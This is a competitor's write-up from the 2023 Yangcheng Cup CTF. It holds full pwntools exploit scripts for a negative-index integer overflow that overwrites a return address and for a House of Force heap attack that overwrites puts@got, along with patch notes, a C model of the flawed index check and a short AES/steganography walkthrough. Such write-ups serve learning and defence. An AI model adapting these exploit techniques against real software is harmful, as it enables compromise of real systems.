2023 羊城杯 (Yangcheng Cup) partial writeups

My brain froze during the competition and I let the team down badly, so this is just a quick record.

pwn

arrary_index_bank:

Integer overflow, nothing much to say: option "1" leaks a libc address, and option "2" with the input 0x800000000000000f can modify the return address.

```python
from pwn import *

context(log_level='debug', arch='amd64', os='linux')
p = process('./pwn')
#p = remote('10.1.114.2', 10000)
elf = ELF('./index')
libc = ELF('./libc-2.31.so')

sa = lambda a, s: p.sendafter(a, s)
sla = lambda a, s: p.sendlineafter(a, s)
s = lambda a: p.send(a)
sl = lambda a: p.sendline(a)
ru = lambda s: p.recvuntil(s)
rc = lambda s: p.recv(s)
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
get_libc = lambda: u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))
plo = lambda o: p64(libc_base + o)

# Option 1 with index -1: the index check lets a negative value through, so the
# program prints the slot just before the array (in decimal) and leaks an address.
sla(b'> ', b'1')
sla(b'Whose account?\n', b'-1')
ru(b'accounts[-1] = ')
stack_addr = int(p.recvuntil(b'\n')[:-1], 10)
stack_addr -= 0x1426      # author's offset from the leaked value to the reference base
success('stack_addr: ' + hex(stack_addr))

# Value to write over the return address (author's offsets from the leak).
win = stack_addr + 0x1310 + 5
# Option 2 with a huge negative index (-9223372036854775801 = 0x8000000000000007):
# the check only guards the positive side, and idx * 8 wraps to a small offset,
# so the write lands on the saved return address.
sla(b'> ', b'2')
sla(b'Whose account?\n', b'-9223372036854775801')
print(hex(win))
#gdb.attach(p)
#pause()
sla(b'How much?\n', str(win).encode())
#sla(b'> ', b'3')
#gdb.attach(p)
#pause()

p.interactive()
```

fix: patch the conditional jump of the positive-value check.
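As an added illustration (not the challenge's source, which is not on this page), here is a hypothetical C model of the index check that the fix note refers to: a signed comparison that only tests the upper bound lets -1 and the script's -9223372036854775801 (0x8000000000000007) through, and scaling that huge negative index by 8 wraps to a small positive byte offset. Comparing as unsigned rejects both; the array size and sample balances are constructed.

```c
#include <stdint.h>
#include <stdbool.h>

#define ACCOUNTS 16   /* hypothetical array size, not from the challenge */

/* Constructed sample ledger for the demonstration. */
static int64_t g_accounts[ACCOUNTS] = {100, 200, 300, 42};

/* Weak check modelled on the bug class in the writeup: only the upper
 * bound is tested, and as a signed comparison, so every negative
 * index passes. */
bool index_ok_weak(int64_t idx) {
    return idx < ACCOUNTS;
}

/* Hardened check: compare as unsigned, so a negative index turns into
 * a huge value and fails the same upper-bound test. This is the effect
 * of repairing the "positive check" jump (jg/jl -> ja/jb style). */
bool index_ok_fixed(int64_t idx) {
    return (uint64_t)idx < (uint64_t)ACCOUNTS;
}

/* Byte offset into an array of 8-byte slots, using the wrapping
 * arithmetic the CPU performs: 0x8000000000000007 * 8 == 0x38. */
uint64_t byte_offset(int64_t idx) {
    return (uint64_t)idx * 8u;
}

/* Balance lookup through the hardened check; returns -1 on rejection
 * (sample balances are non-negative, so -1 is unambiguous here). */
int64_t lookup_balance(int64_t idx) {
    if (!index_ok_fixed(idx))
        return -1;
    return g_accounts[idx];
}
```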

ez_force:

House of Force. My brain froze during the competition and I only remembered House of Force in the last ten minutes; I had finished all the patches in the fix phase before coming back to it, so I really let the team down, otherwise we could have scraped a third prize.

```python
from pwn import *

context(log_level='debug', arch='amd64', os='linux')
p = process('./force')
elf = ELF('./force')
libc = ELF('./libc-2.23.so')

sa = lambda a, s: p.sendafter(a, s)
sla = lambda a, s: p.sendlineafter(a, s)
s = lambda a: p.send(a)
sl = lambda a: p.sendline(a)
ru = lambda s: p.recvuntil(s)
rc = lambda s: p.recv(s)
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
get_libc = lambda: u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))
plo = lambda o: p64(libc_base + o)

def add(index, size, content):
    """Menu option 1: allocate `size` bytes in slot `index` and write `content` into it."""
    sla(b'4.go away', b'1')
    sla(b'which index?\n', str(index).encode())
    sla(b'how much space do u want?\n', str(size).encode())
    sa(b'now what to write?\n', content)

# Chunk 0 is only 0x10 bytes but the read accepts more: the 32-byte payload
# spills past the chunk and sets the top chunk size to 0xffffffffffffffff.
add(0, 0x10, b'/bin/sh\x00' + p64(0) * 2 + p64(0xffffffffffffffff))
# The program prints a heap pointer ("balckbroad" is the binary's own spelling).
ru(b'the balckbroad on ')
heap_addr = int(p.recvuntil(b' ')[:-1], 16)
heap_base = heap_addr - 0x1020
top_heap = heap_base + 0x1030
puts_got = elf.got['puts']
success('heap: ' + hex(heap_base))
# Negative request size that moves the top chunk to just below puts@got.
offset = -(top_heap - puts_got) + 0x10
success('offset: ' + hex(offset))
add(1, offset, b'/bin/sh\x00')

# The next allocation is carved from the relocated top chunk, i.e. at puts@got;
# the three bytes partially overwrite its low bytes (author's target value).
add(2, 0x10, b'\x47\x12\x8f')
# Go through the menu once more so the program calls through the patched entry.
sla(b'4.go away', b'1')
sla(b'which index?\n', b'3')
sla(b'how much space do u want?\n', b'32')

p.interactive()
```

fix: limit the number of bytes read to the size of the chunk being created.

misc:

### easy00aes

Hmm, the network was down, but we had offline tools, so it went through in one pass.

Brief walkthrough:

foremost carves out an archive; its password is the base64 of that image's filename, which yields flag.jpg and key.txt. Run key.txt through zero-width steganography to get the key (most teams got stuck at this step because the network was down). flag.jpg is actually a PNG; fix its width and height to reveal the ciphertext, then AES-decrypt it to get the flag.